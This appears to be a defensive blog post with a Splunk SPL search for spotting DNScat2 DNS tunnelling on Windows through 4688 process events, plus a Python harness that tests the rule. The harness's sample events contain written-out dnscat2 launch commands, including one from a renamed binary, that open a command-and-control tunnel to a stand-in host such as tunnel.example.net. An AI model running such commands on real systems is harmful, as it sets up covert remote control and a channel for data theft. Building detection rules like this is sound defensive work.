It is always DNS
For those following along with ATT&CK this entry is about Application Layer Protocol: DNS, Command And Control technique T1071.
Looking at DNScat2, I was interested in detecting activity on the endpoint rather than picking through voluminous network logs. If we look at the structure of the command-line arguments shown on GitHub, we can see some potential detections already, even if the binary itself is renamed.
So the CLI arguments we are looking for are "--secret", "--dns", "port" and "host", as well as an FQDN or IP address for the server side.
Throwing together a really rough detection: if the DNScat2 process is launched from the command line on Windows, the Creator Process Name will be cmd.exe, and we can use URL Toolbox (the `ut_parse_extended` macro) in place of an unwieldy regex to pull the server address out of the command-line field.
Our SPL will look something like this:
index=win10 sourcetype="WinEventLog:Security" EventCode=4688 Creator_Process_Name=C:\\Windows\\*\\cmd.exe Process_Command_Line="* --secret=*"
| eval utlist="*"
| `ut_parse_extended(Process_Command_Line, utlist)`
| where ut_domain!="None"
| table _time Account_Name ComputerName New_Process_Name Process_Command_Line ut_domain
Here's a screenshot of this SPL in operation
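The same three filters the SPL applies (a cmd.exe parent, a "--secret=" argument, and a server name or IP somewhere in the command line) can be checked outside Splunk, for example in a unit test for the rule or against a CSV export of 4688 events. The block below is an added example written for this post, not code from the post or from the dnscat2 project. The 4688 events are constructed samples with the field names Splunk gives the WinEventLog:Security sourcetype, the `host=`/`server=`/`port=` option syntax in them is assumed from the dnscat2 usage text, and the skip of tokens ending in an executable extension is a simple stand-in for URL Toolbox's suffix matching, not a reimplementation of it.

```python
import re

# Constructed sample 4688 events (not real telemetry). Two should match the
# rule, one is launched from PowerShell (outside the cmd.exe filter) and one
# has --secret= but no server name, which the SPL drops via ut_domain!="None".
SAMPLE_EVENTS = [
    {
        "_time": "2024-01-01T10:00:00", "Account_Name": "alice", "ComputerName": "WS01",
        "Creator_Process_Name": r"C:\Windows\System32\cmd.exe",
        "New_Process_Name": r"C:\Users\alice\Downloads\dnscat2.exe",
        "Process_Command_Line": "dnscat2.exe --dns host=tunnel.example.net,port=53 --secret=s3cret",
    },
    {   # Renamed binary: the rule keys on the arguments, not the image name.
        "_time": "2024-01-01T10:05:00", "Account_Name": "bob", "ComputerName": "WS02",
        "Creator_Process_Name": r"C:\Windows\SysWOW64\cmd.exe",
        "New_Process_Name": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
        "Process_Command_Line": "svchost.exe --secret=abc123 --dns server=10.0.0.5,port=5353",
    },
    {   # Parent is powershell.exe, so the Creator_Process_Name filter excludes it.
        "_time": "2024-01-01T10:10:00", "Account_Name": "carol", "ComputerName": "WS03",
        "Creator_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "New_Process_Name": r"C:\Tools\client.exe",
        "Process_Command_Line": "client.exe --dns host=tunnel.example.net --secret=zzz",
    },
    {   # --secret= present but no FQDN or IP: ut_domain would be "None".
        "_time": "2024-01-01T10:15:00", "Account_Name": "dave", "ComputerName": "WS04",
        "Creator_Process_Name": r"C:\Windows\System32\cmd.exe",
        "New_Process_Name": r"C:\Tools\tool.exe",
        "Process_Command_Line": "tool.exe --secret=xyz --help",
    },
]

# Equivalent of Creator_Process_Name=C:\\Windows\\*\\cmd.exe (SPL * spans backslashes).
CMD_CREATOR = re.compile(r"^C:\\Windows\\.*\\cmd\.exe$", re.IGNORECASE)
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
FQDN = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.IGNORECASE)
# Heuristic stand-in for URL Toolbox's suffix list: file names are not domains.
FILE_SUFFIXES = (".exe", ".dll", ".bat", ".cmd", ".ps1")


def extract_server(cmdline):
    """Return the first IP address or FQDN in the command line, or None.
    Tokens are split on whitespace, commas and '=' so host=x,port=53 works."""
    for token in re.split(r"[\s,=]+", cmdline):
        token = token.strip("\"'")
        if not token or token.lower().endswith(FILE_SUFFIXES):
            continue
        if IPV4.match(token) or FQDN.match(token):
            return token
    return None


def detect_dnscat2_launch(event):
    """Apply the SPL's filters to one event; return the 'table' row or None."""
    if not CMD_CREATOR.match(event.get("Creator_Process_Name", "")):
        return None
    cmdline = event.get("Process_Command_Line", "")
    if " --secret=" not in cmdline:            # Process_Command_Line="* --secret=*"
        return None
    server = extract_server(cmdline)
    if server is None:                          # where ut_domain!="None"
        return None
    return {
        "_time": event["_time"],
        "Account_Name": event["Account_Name"],
        "ComputerName": event["ComputerName"],
        "New_Process_Name": event["New_Process_Name"],
        "Process_Command_Line": cmdline,
        "ut_domain": server,
    }


def run_detection(events):
    """Run the rule over a list of events and return only the matching rows."""
    return [row for row in (detect_dnscat2_launch(e) for e in events) if row]


if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row["_time"], row["ComputerName"], row["New_Process_Name"], "->", row["ut_domain"])
```

Running it prints the two matching rows (the renamed svchost.exe copy among them) and nothing for the PowerShell-launched or server-less events, which is the behaviour the SPL's `where ut_domain!="None"` clause gives.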